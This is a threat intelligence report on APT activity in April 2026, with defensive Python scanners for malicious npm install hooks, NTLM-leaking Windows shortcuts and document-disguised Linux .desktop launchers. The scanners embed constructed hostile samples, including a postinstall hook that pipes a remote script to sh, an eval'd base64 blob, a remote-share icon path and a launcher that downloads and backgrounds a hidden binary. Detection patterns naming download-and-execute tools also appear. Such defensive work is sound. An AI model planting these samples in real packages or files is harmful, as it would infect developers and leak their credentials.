April 2026 Threat Trend Report on APT Groups

Purpose and Scope


This report covers cyber espionage and covert sabotage activity by state-sponsored threat groups, that is, groups believed to be supported by a national government; it excludes cybercrime groups that operate for financial gain. Based on publicly available analysis from the past month, threat actors are categorized under the representative group names used in ATIP.

Leading APT groups by Region


North Korea.


North Korea-linked groups have focused on developers and the cryptocurrency sector. UNC1069 conducted supply chain attacks by tampering with the Axios npm package and injecting malicious dependencies, while Lazarus combined fake job interviews, GitHub projects, AI-generated content, and ClickFix (a social-engineering technique that tricks users into copying and running commands themselves) to extend its reach into macOS, Web3, and cryptocurrency environments.

Famous Chollima.

Famous Chollima (Contagious Interview) published malicious packages to five open source ecosystems (npm, PyPI, Go Modules, crates.io, and Packagist) to deliver a staged RAT payload. Stolen data included credentials, browser data, password manager contents, and cryptocurrency wallet data.

VoidDokkaebi.

VoidDokkaebi lured developers with fake job interviews and turned code repositories into supply chain infection channels. Tooling mentioned in the reporting includes DEV#POPPER RAT, InvisibleFerret, OtterCookie, OmniStealer, and BeaverTail.
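The common thread in the three North Korean campaigns above is a package that executes at install time or hides a second stage in its own source. The following added example (not code from the original report or from any vendor it cites) scans an npm package manifest and its entry script for install-time lifecycle hooks and obfuscation markers. The sample manifest, the sample script, the indicator patterns, the host 198.51.100.7 and the "two source markers" threshold are all constructed for illustration, not taken from a real package.

```python
"""Scan an npm package manifest and its entry script for install-time hooks
and obfuscation markers of the kind used by fake-interview supply chain
packages. Added example; every sample below is constructed."""
import json
import re

# Lifecycle scripts npm runs automatically during install, without any
# action by the developer beyond `npm install`.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Primitives that rarely belong in a library's install hook: remote download,
# inline JavaScript execution, decoding of an embedded blob, piping to a shell.
HOOK_INDICATORS = {
    "remote_download": re.compile(r"\b(curl|wget|Invoke-WebRequest|iwr)\b", re.I),
    "inline_js": re.compile(r"\bnode\s+-e\b"),
    "decode_blob": re.compile(r"\b(base64|atob|Buffer\.from\()", re.I),
    "shell_chain": re.compile(r"\|\s*(sh|bash|node)\b"),
}

# Markers in the package's own JavaScript: dynamic code execution, process
# spawning, and large opaque string literals that typically hide a stage two.
SOURCE_INDICATORS = {
    "dynamic_eval": re.compile(r"\b(eval|Function)\s*\("),
    "spawn_process": re.compile(r"require\(\s*['\"]child_process['\"]\s*\)"),
    "long_base64": re.compile(r"['\"][A-Za-z0-9+/]{200,}={0,2}['\"]"),
    "hex_escaped": re.compile(r"(\\x[0-9a-fA-F]{2}){8,}"),
}


def scan_manifest(manifest):
    """Return (hook, indicator, command) for every suspicious install hook."""
    findings = []
    scripts = manifest.get("scripts", {})
    for hook in INSTALL_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        for name, pattern in HOOK_INDICATORS.items():
            if pattern.search(cmd):
                findings.append((hook, name, cmd))
    return findings


def scan_source(source):
    """Return the sorted list of source indicators present in a JS file."""
    return sorted(name for name, pattern in SOURCE_INDICATORS.items()
                  if pattern.search(source))


def assess(manifest, source):
    """Any install-hook finding, or two or more source markers, is suspicious
    (threshold is an assumption for this example)."""
    hooks = scan_manifest(manifest)
    source_hits = scan_source(source)
    verdict = "suspicious" if hooks or len(source_hits) >= 2 else "clean"
    return {"verdict": verdict, "hooks": hooks, "source": source_hits}


# Constructed sample manifest: a postinstall hook that fetches and runs a
# remote script through node -e. Not a real package.
SAMPLE_MANIFEST = json.loads("""{
  "name": "example-validator-utils",
  "version": "1.0.3",
  "main": "index.js",
  "scripts": {
    "postinstall": "node -e \\"require('child_process').exec('curl -s http://198.51.100.7/s | sh')\\""
  }
}""")

# Constructed sample entry file: a 240-character base64 blob fed to eval().
SAMPLE_SOURCE = (
    "const c = require('child_process');\n"
    "const p = '" + "QUFB" * 60 + "';\n"
    "eval(Buffer.from(p, 'base64').toString());\n"
)

if __name__ == "__main__":
    print(json.dumps(assess(SAMPLE_MANIFEST, SAMPLE_SOURCE), indent=2))
```

Run it against a freshly downloaded tarball's package.json and main file before the package is installed; the point of checking lifecycle hooks is that they execute before any of the package's API is ever called.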

China.


China-linked groups have been targeting cloud and network infrastructure. Mustang Panda targeted European and Middle Eastern governments and diplomatic organizations, using tracking pixels (web bugs) for reconnaissance, abusing OAuth redirects, serving fake Cloudflare Turnstile pages, and distributing PlugX. Silver Fox targeted Japanese users with Rakuten billing lures and executed ValleyRAT through DLL side-loading against legitimately signed Dell/Waves MaxxAudio executables.

Russia.


APT28 compromised vulnerable SOHO routers and other network equipment to tamper with DNS settings and redirect traffic to attacker infrastructure. At the same time, it used a zero-click vulnerability (CVE-2026-32202) in a Windows LNK file-based attack chain to steal NTLM credentials. Sandworm (APT-C-13) gained access through a ZIP file containing a malicious LNK and exposed SMB, RDP, and SSH services as .onion services through nested Tor and SSH tunnels.
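Both Russian chains above start from a Windows shortcut. As an added example (not from the report or any vendor it cites), the following parser reads the Shell Link header and string-data fields of a .lnk file and flags any field that holds a UNC path, which is the element an NTLM-leak chain needs: when Explorer renders or resolves the shortcut it fetches the icon or target over SMB and authenticates to the remote host. It does not model CVE-2026-32202 itself, whose details the report does not give. The sample .lnk bytes and the host 203.0.113.10 are constructed.

```python
"""Parse a Windows Shell Link (.lnk) and flag string fields that reference a
remote UNC path. Added example; the sample LNK is constructed, not a real
artifact. Layout follows MS-SHLLINK: 76-byte header, optional LinkTargetIDList,
optional LinkInfo, then up to five counted strings."""
import re
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

# StringData fields in the order they appear in the file.
STRING_FIELDS = (("name", HAS_NAME), ("relative_path", HAS_RELATIVE_PATH),
                 ("working_dir", HAS_WORKING_DIR), ("arguments", HAS_ARGUMENTS),
                 ("icon_location", HAS_ICON_LOCATION))

# \\host\share... : any such reference causes an outbound SMB connection.
UNC_RE = re.compile(r"\\\\[^\\\s]+\\")


def _read_string(buf, off, unicode):
    """Counted string: u16 character count, then characters (UTF-16LE if the
    IsUnicode flag is set, otherwise single-byte)."""
    (count,) = struct.unpack_from("<H", buf, off)
    off += 2
    if unicode:
        return buf[off:off + count * 2].decode("utf-16-le"), off + count * 2
    return buf[off:off + count].decode("latin-1"), off + count


def parse_lnk(buf):
    """Return the StringData fields of a .lnk as a dict."""
    if len(buf) < 76 or struct.unpack_from("<I", buf, 0)[0] != 0x4C or buf[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    (flags,) = struct.unpack_from("<I", buf, 20)
    off = 76
    if flags & HAS_LINK_TARGET_ID_LIST:          # skip the ID list entirely
        (id_list_size,) = struct.unpack_from("<H", buf, off)
        off += 2 + id_list_size
    if flags & HAS_LINK_INFO:                    # LinkInfoSize includes itself
        (link_info_size,) = struct.unpack_from("<I", buf, off)
        off += link_info_size
    unicode = bool(flags & IS_UNICODE)
    fields = {}
    for key, bit in STRING_FIELDS:
        if flags & bit:
            fields[key], off = _read_string(buf, off, unicode)
    return fields


def unc_references(fields):
    """(field, value) pairs whose value points at a UNC path."""
    return [(k, v) for k, v in fields.items() if UNC_RE.search(v)]


def scan_file(path):
    with open(path, "rb") as fh:
        return unc_references(parse_lnk(fh.read()))


def build_sample_lnk():
    """Constructed sample: a shortcut named like a PDF whose icon lives on a
    remote share, so merely displaying it in Explorer triggers SMB auth."""
    flags = HAS_NAME | HAS_ICON_LOCATION | IS_UNICODE
    header = struct.pack("<I16sII", 0x4C, LNK_CLSID, flags, 0x20)   # size, CLSID, flags, attrs
    header += b"\x00" * 24                                           # three zero FILETIMEs
    header += struct.pack("<IiIHHII", 0, 0, 1, 0, 0, 0, 0)          # size, icon idx, SW_SHOWNORMAL, hotkey, reserved
    assert len(header) == 76

    def counted(text):
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")

    return header + counted("Quarterly Report.pdf") + counted("\\\\203.0.113.10\\public\\report.ico")


if __name__ == "__main__":
    print(unc_references(parse_lnk(build_sample_lnk())))
```

Run `scan_file` over attachments extracted from ZIPs at the mail gateway; a shortcut whose icon or target resolves to an external host is worth blocking regardless of which vulnerability, if any, the chain goes on to use.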

Iran.


Charming Kitten (APT35) exploited the Exchange Server ProxyLogon vulnerability (CVE-2021-26855) to operate a multi-layered infrastructure, while OilRig (APT-C-49) used a stealthy C2 scheme combining Excel macros with GitHub, Google Drive, and Telegram bots. Bitter used Android spyware, including ProSpy, against civil society and government-related targets in the Middle East.

Pakistan.


Transparent Tribe (APT36) ran Operation TrustTrap, a large-scale domain spoofing campaign that mimicked government portals to steal credentials and payment card data; it also operated DeskRAT, which abuses .desktop launcher files in Linux environments and communicates over WebSocket C2.
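The .desktop abuse works because a launcher file whose Name and Icon look like a document runs whatever its Exec line says when it is double-clicked, with no terminal shown. The following added example (not the report's or any vendor's code) parses .desktop files and scores the combination of document-like presentation with a shell payload. The two sample files, the indicator list, the host 203.0.113.45 and the score threshold are constructed assumptions for this example.

```python
"""Flag .desktop launcher files that masquerade as documents but execute a
payload, as in a Linux RAT dropper chain. Added example; the sample files
and thresholds are constructed."""
import configparser
import re

# Icon names and filename suffixes that make a launcher look like a document.
DOC_ICONS = ("pdf", "x-office-document", "libreoffice", "text-x-generic", "msword")
DOC_SUFFIXES = (".pdf", ".docx", ".xlsx", ".pptx")

# Payload indicators in the Exec line.
PAYLOAD_RE = {
    "shell_wrapper": re.compile(r"\b(bash|sh|python3?|perl)\s+-c\b"),
    "remote_fetch": re.compile(r"\b(curl|wget)\b"),
    "decode_blob": re.compile(r"\bbase64\b|\bxxd\b"),
    "hidden_path": re.compile(r"(?:^|\s|=)/(?:tmp|dev/shm|var/tmp)/|(?:~|\$HOME)/\.[\w-]+/"),
    "background": re.compile(r"\bnohup\b|&\s*$|\bsetsid\b"),
}


def parse_desktop(text):
    """Return the [Desktop Entry] group as a dict, keys case-preserved."""
    cp = configparser.ConfigParser(interpolation=None, delimiters=("=",))
    cp.optionxform = str          # keep Exec/Icon/Name as written
    cp.read_string(text)
    if "Desktop Entry" not in cp:
        raise ValueError("no [Desktop Entry] group")
    return dict(cp["Desktop Entry"])


def assess_desktop(text):
    entry = parse_desktop(text)
    exec_line = entry.get("Exec", "")
    hits = sorted(n for n, p in PAYLOAD_RE.items() if p.search(exec_line))
    icon = entry.get("Icon", "").lower()
    name = entry.get("Name", "").lower()
    masquerade = any(t in icon for t in DOC_ICONS) or name.endswith(DOC_SUFFIXES)
    silent = entry.get("Terminal", "false").lower() == "false"
    # Scoring is an assumption: each payload marker 1, document disguise 2,
    # and 1 more when a payload runs with no terminal to alert the user.
    score = len(hits) + (2 if masquerade else 0) + (1 if silent and hits else 0)
    return {
        "name": entry.get("Name", ""),
        "hits": hits,
        "masquerade": masquerade,
        "score": score,
        "verdict": "suspicious" if score >= 3 else "benign",
    }


# Constructed sample: opens a decoy PDF, then fetches, decodes and
# backgrounds a hidden binary under ~/.config.
MALICIOUS_DESKTOP = """[Desktop Entry]
Type=Application
Name=Meeting_Notes.pdf
Icon=application-pdf
Terminal=false
Exec=bash -c "xdg-open /tmp/.cache/Meeting_Notes.pdf; curl -s http://203.0.113.45/d | base64 -d > $HOME/.config/.sysd && chmod +x $HOME/.config/.sysd && nohup $HOME/.config/.sysd &"
"""

# Constructed sample: an ordinary application launcher.
BENIGN_DESKTOP = """[Desktop Entry]
Type=Application
Name=Text Editor
Icon=org.gnome.TextEditor
Exec=gnome-text-editor %U
Terminal=false
"""

if __name__ == "__main__":
    for sample in (MALICIOUS_DESKTOP, BENIGN_DESKTOP):
        print(assess_desktop(sample))
```

Point it at files arriving in Downloads, mail attachments, and the per-user autostart directory; a launcher that both looks like a document and runs a shell is the combination that matters, since either property alone is common in legitimate software.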

Others.


Harvester deployed GoGra, a Linux backdoor that abused Microsoft Graph APIs and Outlook mailboxes as covert C2 channels. TGR-STA-1030 ran a global espionage campaign combining phishing, exploitation of public vulnerabilities, Cobalt Strike, VShell, and the ShadowGuard eBPF rootkit. UAT-4356 exploited CVE-2025-20333 and CVE-2025-20362 to deploy the FIRESTARTER backdoor on Cisco Firepower FXOS devices.

Conclusion


In April 2026, a total of 15 APT groups were disclosed. The main attack methods can be summarized as email-based social engineering, supply chain attacks, router and network device takeover, and zero-click and vulnerability exploitation. Security, energy, diplomacy, politics, high-tech industry, and aerospace are the primary target sectors, so organizations need a phased, layered response capability and internal visibility.